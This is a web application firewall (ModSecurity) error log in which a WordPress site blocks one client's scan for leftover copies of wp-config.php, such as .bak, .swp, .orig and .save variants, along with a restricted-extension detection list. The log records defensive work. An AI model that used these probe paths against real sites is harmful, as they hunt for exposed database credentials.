[Tue May 12 02:18:17.832993 2026] [security2:error] [pid 1695975:tid 1695997] [client 130.12.182.66:57456] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php~"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/wp-config.php~"] [unique_id "agJxydVI9ymHBxup74-GswAAAJM"]
[Tue May 12 02:18:17.833166 2026] [security2:error] [pid 1695975:tid 1695997] [client 130.12.182.66:57456] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-config.php~"] [unique_id "agJxydVI9ymHBxup74-GswAAAJM"]
[Tue May 12 02:18:17.836518 2026] [security2:error] [pid 1707624:tid 1707693] [client 130.12.182.66:57386] ModSecurity: Warning. Matched phrase "wp-config.txt" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.txt found within REQUEST_FILENAME: /wp-config.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/wp-config.txt"] [unique_id "agJxybOxS7i6i_mT2NLCiwAAAEs"]
[Tue May 12 02:18:17.836673 2026] [security2:error] [pid 1707624:tid 1707693] [client 130.12.182.66:57386] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-config.txt"] [unique_id "agJxybOxS7i6i_mT2NLCiwAAAEs"]
[Tue May 12 02:18:17.839394 2026] [security2:error] [pid 1691274:tid 1691285] [client 130.12.182.66:57444] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/wp-config.php.swp"] [unique_id "agJxyVfdQaraX_prmqcYRwAAAAg"]
[Tue May 12 02:18:17.839542 2026] [security2:error] [pid 1691274:tid 1691285] [client 130.12.182.66:57444] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-config.php.swp"] [unique_id "agJxyVfdQaraX_prmqcYRwAAAAg"]
[Tue May 12 02:18:17.840022 2026] [security2:error] [pid 1709071:tid 1709111] [client 130.12.182.66:57400] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/wp-config.php.save"] [unique_id "agJxybvMumyrWMfSu7qiiAAAANg"]
[Tue May 12 02:18:17.840163 2026] [security2:error] [pid 1709071:tid 1709111] [client 130.12.182.66:57400] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-config.php.save"] [unique_id "agJxybvMumyrWMfSu7qiiAAAANg"]
[Tue May 12 02:18:17.840238 2026] [security2:error] [pid 1730175:tid 1730186] [client 130.12.182.66:57440] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/wp-config.php.orig"] [unique_id "agJxyXo6NvB9WXx5V-5z8QAAAQk"]
[Tue May 12 02:18:17.840502 2026] [security2:error] [pid 1730175:tid 1730186] [client 130.12.182.66:57440] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-config.php.orig"] [unique_id "agJxyXo6NvB9WXx5V-5z8QAAAQk"]
[Tue May 12 02:18:18.490929 2026] [security2:error] [pid 1691274:tid 1691278] [client 130.12.182.66:57422] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJxyVfdQaraX_prmqcYRgAAAAE"]
[Tue May 12 02:18:18.517383 2026] [security2:error] [pid 1691274:tid 1691285] [client 130.12.182.66:57444] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJxyVfdQaraX_prmqcYRwAAAAg"]
[Tue May 12 02:18:18.522551 2026] [security2:error] [pid 1730175:tid 1730186] [client 130.12.182.66:57440] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJxyXo6NvB9WXx5V-5z8QAAAQk"]
[Tue May 12 02:18:18.532563 2026] [security2:error] [pid 1709071:tid 1709111] [client 130.12.182.66:57400] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJxybvMumyrWMfSu7qiiAAAANg"]
[Tue May 12 02:18:18.548294 2026] [security2:error] [pid 1695975:tid 1695997] [client 130.12.182.66:57456] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJxydVI9ymHBxup74-GswAAAJM"]
[Tue May 12 02:18:18.673685 2026] [security2:error] [pid 1730175:tid 1730178] [client 130.12.182.66:41072] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.old"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/wp-config.php.old"] [unique_id "agJxyno6NvB9WXx5V-5z8gAAAQE"]
[Tue May 12 02:18:18.673685 2026] [security2:error] [pid 1730207:tid 1730216] [client 130.12.182.66:41064] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.swp"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/wp-config.php.swp"] [unique_id "agJxyjue9Sp-pIv_Bb6JkAAAAUc"]
[Tue May 12 02:18:18.673908 2026] [security2:error] [pid 1730207:tid 1730216] [client 130.12.182.66:41064] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-config.php.swp"] [unique_id "agJxyjue9Sp-pIv_Bb6JkAAAAUc"]
[Tue May 12 02:18:18.673909 2026] [security2:error] [pid 1730175:tid 1730178] [client 130.12.182.66:41072] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-config.php.old"] [unique_id "agJxyno6NvB9WXx5V-5z8gAAAQE"]
[Tue May 12 02:18:18.674117 2026] [security2:error] [pid 1730175:tid 1730178] [client 130.12.182.66:41072] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agJxyno6NvB9WXx5V-5z8gAAAQE"]
[Tue May 12 02:18:18.674120 2026] [security2:error] [pid 1730207:tid 1730216] [client 130.12.182.66:41064] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agJxyjue9Sp-pIv_Bb6JkAAAAUc"]
[Tue May 12 02:18:19.035905 2026] [security2:error] [pid 1707624:tid 1707693] [client 130.12.182.66:57386] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJxybOxS7i6i_mT2NLCiwAAAEs"]
[Tue May 12 02:18:19.042288 2026] [security2:error] [pid 1730175:tid 1730189] [client 130.12.182.66:57414] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJxyXo6NvB9WXx5V-5z8AAAAQw"]
[Tue May 12 02:18:19.056790 2026] [security2:error] [pid 1730207:tid 1730212] [client 130.12.182.66:57428] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/index.php"] [unique_id "agJxyTue9Sp-pIv_Bb6JjgAAAUM"]
[Tue May 12 02:18:20.983338 2026] [security2:error] [pid 1730175:tid 1730180] [client 130.12.182.66:41078] ModSecurity: Warning. String match within ".asa/ .asax/ .ascx/ .axd/ .backup/ .bak/ .bat/ .cdx/ .cer/ .cfg/ .cmd/ .com/ .config/ .conf/ .cs/ .csproj/ .csr/ .dat/ .db/ .dbf/ .dll/ .dos/ .htr/ .htw/ .ida/ .idc/ .idq/ .inc/ .ini/ .key/ .licx/ .lnk/ .log/ .mdb/ .old/ .pass/ .pdb/ .pol/ .printer/ .pwd/ .resources/ .resx/ .sql/ .sys/ .vb/ .vbs/ .vbproj/ .vsdisco/ .webinfo/ .xsd/ .xsx/" at TX:extension. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-920-PROTOCOL-ENFORCEMENT.conf"] [line "452"] [id "920440"] [rev "2"] [msg "URL file extension is restricted by policy"] [data ".backup"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "9"] [accuracy "9"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-protocol"] [tag "OWASP_CRS/POLICY/EXT_RESTRICTED"] [tag "WASCTC/WASC-15"] [tag "OWASP_TOP_10/A7"] [tag "PCI/6.5.10"] [hostname "rentparadise.fr"] [uri "/wp-config.backup"] [unique_id "agJxzHo6NvB9WXx5V-5z8wAAAQM"]
[Tue May 12 02:18:20.983463 2026] [security2:error] [pid 1730207:tid 1730211] [client 130.12.182.66:41124] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.bak"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/wp-config.php.bak"] [unique_id "agJxzDue9Sp-pIv_Bb6JkQAAAUI"]
[Tue May 12 02:18:20.983676 2026] [security2:error] [pid 1730175:tid 1730180] [client 130.12.182.66:41078] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-config.backup"] [unique_id "agJxzHo6NvB9WXx5V-5z8wAAAQM"]
[Tue May 12 02:18:20.983676 2026] [security2:error] [pid 1730207:tid 1730211] [client 130.12.182.66:41124] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-config.php.bak"] [unique_id "agJxzDue9Sp-pIv_Bb6JkQAAAUI"]
[Tue May 12 02:18:20.983747 2026] [security2:error] [pid 1709071:tid 1709107] [client 130.12.182.66:41088] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.orig"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/wp-config.php.orig"] [unique_id "agJxzLvMumyrWMfSu7qiiwAAANQ"]
[Tue May 12 02:18:20.983754 2026] [security2:error] [pid 1695975:tid 1695996] [client 130.12.182.66:41104] ModSecurity: Warning. Matched phrase "wp-config.php" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.php found within REQUEST_FILENAME: /wp-config.php.save"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/wp-config.php.save"] [unique_id "agJxzNVI9ymHBxup74-GtgAAAJI"]
[Tue May 12 02:18:20.983857 2026] [security2:error] [pid 1730207:tid 1730211] [client 130.12.182.66:41124] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agJxzDue9Sp-pIv_Bb6JkQAAAUI"]
[Tue May 12 02:18:20.983867 2026] [security2:error] [pid 1730175:tid 1730180] [client 130.12.182.66:41078] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=0,RCE=0,PHPI=0,HTTP=0,SESS=0): URL file extension is restricted by policy"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agJxzHo6NvB9WXx5V-5z8wAAAQM"]
[Tue May 12 02:18:20.983928 2026] [security2:error] [pid 1695975:tid 1695996] [client 130.12.182.66:41104] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-config.php.save"] [unique_id "agJxzNVI9ymHBxup74-GtgAAAJI"]
[Tue May 12 02:18:20.983959 2026] [security2:error] [pid 1709071:tid 1709107] [client 130.12.182.66:41088] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-config.php.orig"] [unique_id "agJxzLvMumyrWMfSu7qiiwAAANQ"]
[Tue May 12 02:18:20.984166 2026] [security2:error] [pid 1695975:tid 1695996] [client 130.12.182.66:41104] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agJxzNVI9ymHBxup74-GtgAAAJI"]
[Tue May 12 02:18:20.984169 2026] [security2:error] [pid 1709071:tid 1709107] [client 130.12.182.66:41088] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agJxzLvMumyrWMfSu7qiiwAAANQ"]
[Tue May 12 02:18:21.009751 2026] [security2:error] [pid 1691274:tid 1691290] [client 130.12.182.66:41102] ModSecurity: Warning. Matched phrase "wp-config.txt" at REQUEST_FILENAME. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-930-APPLICATION-ATTACK-LFI.conf"] [line "49"] [id "930130"] [rev "1"] [msg "Restricted File Access Attempt"] [data "Matched Data: wp-config.txt found within REQUEST_FILENAME: /wp-config.txt"] [severity "CRITICAL"] [ver "OWASP_CRS/3.0.0"] [maturity "7"] [accuracy "8"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-lfi"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "rentparadise.fr"] [uri "/wp-config.txt"] [unique_id "agJxzVfdQaraX_prmqcYSQAAAA0"]
[Tue May 12 02:18:21.009901 2026] [security2:error] [pid 1691274:tid 1691290] [client 130.12.182.66:41102] ModSecurity: Access denied with code 403 (phase 2). Operator GE matched 5 at TX:anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/REQUEST-949-BLOCKING-EVALUATION.conf"] [line "30"] [id "949110"] [msg "Inbound Anomaly Score Exceeded (Total Score: 5)"] [severity "CRITICAL"] [tag "application-multi"] [tag "language-multi"] [tag "platform-multi"] [tag "attack-generic"] [hostname "rentparadise.fr"] [uri "/wp-config.txt"] [unique_id "agJxzVfdQaraX_prmqcYSQAAAA0"]
[Tue May 12 02:18:21.010115 2026] [security2:error] [pid 1691274:tid 1691290] [client 130.12.182.66:41102] ModSecurity: Warning. Operator GE matched 5 at TX:inbound_anomaly_score. [file "/etc/apache2/conf.d/modsec_vendor_configs/OWASP3/rules/RESPONSE-980-CORRELATION.conf"] [line "37"] [id "980130"] [msg "Inbound Anomaly Score Exceeded (Total Inbound Score: 5 - SQLI=0,XSS=0,RFI=0,LFI=5,RCE=0,PHPI=0,HTTP=0,SESS=0): Restricted File Access Attempt"] [tag "event-correlation"] [hostname "rentparadise.fr"] [uri "/403.shtml"] [unique_id "agJxzVfdQaraX_prmqcYSQAAAA0"]
